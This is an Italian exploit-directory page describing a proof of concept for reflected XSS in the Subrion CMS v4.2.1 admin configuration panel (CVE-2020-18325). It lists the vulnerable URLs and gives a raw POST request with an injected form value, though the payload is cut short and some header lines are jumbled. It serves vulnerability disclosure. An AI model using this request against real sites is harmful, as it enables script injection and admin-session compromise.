Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-18325 — Proof-of-concept exploit per vulnerabilità XSS riflesse nel pannello di configurazione di Subrion CMS v4.2.1, che dimostra l'iniezione di JavaScript tramite richieste POST. | Kitploit
Strumenti/GitHubGitHub/hamm0nz/cve-2020-18325
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubhamm0nz/cve-2020-18325

CVE-2020-18325

Proof-of-concept exploit per vulnerabilità XSS riflesse nel pannello di configurazione di Subrion CMS v4.2.1, che dimostra l'iniezione di JavaScript tramite richieste POST.

Vedi Repository
14 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Esiste una vulnerabilità di Cross Site Scripting (XSS) multipla in Intelliants Subrion CMS v4.2.1 nel pannello di configurazione.

Descrizione

Subrion CMS è facile da installare e semplice da gestire. Utilizzalo come applicazione autonoma o insieme ad altre applicazioni per creare siti di livello base, siti di medie o grandi dimensioni.

Sono state scoperte multiple vulnerabilità di Cross-site Scripting riflesso nel pannello di configurazione di Subrion CMS v.4.2.1, che consentono a un attaccante remoto di iniettare JavaScript arbitrario.

Data: 27-02-2022
Link del software: https://subrion.org
Autore dell'exploit: HaMM0nz
CVE: CVE-2020-18325
Categoria: Applicazione Web
URL interessati

  • /panel/configuration/pictures/
  • /panel/configuration/mail/
  • /panel/configuration/miscellaneous/
  • /panel/menus/add/

Prova di concetto

POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623 Content-Length: 5605 Connection: close Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded Upgrade-Insecure-Requests: 1

http://172.16.63.129/panel/configuration/pictures/





-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"

75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx

Cronologia

Scoperta e segnalazione: 24 giugno 2019
ID CVE assegnato: 11 agosto 2021
Pubblicazione: 27 febbraio 2022

Soluzione

Prendere in considerazione la conformità alle linee guida OWASP per la prevenzione delle XSS. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

Scarica lo strumento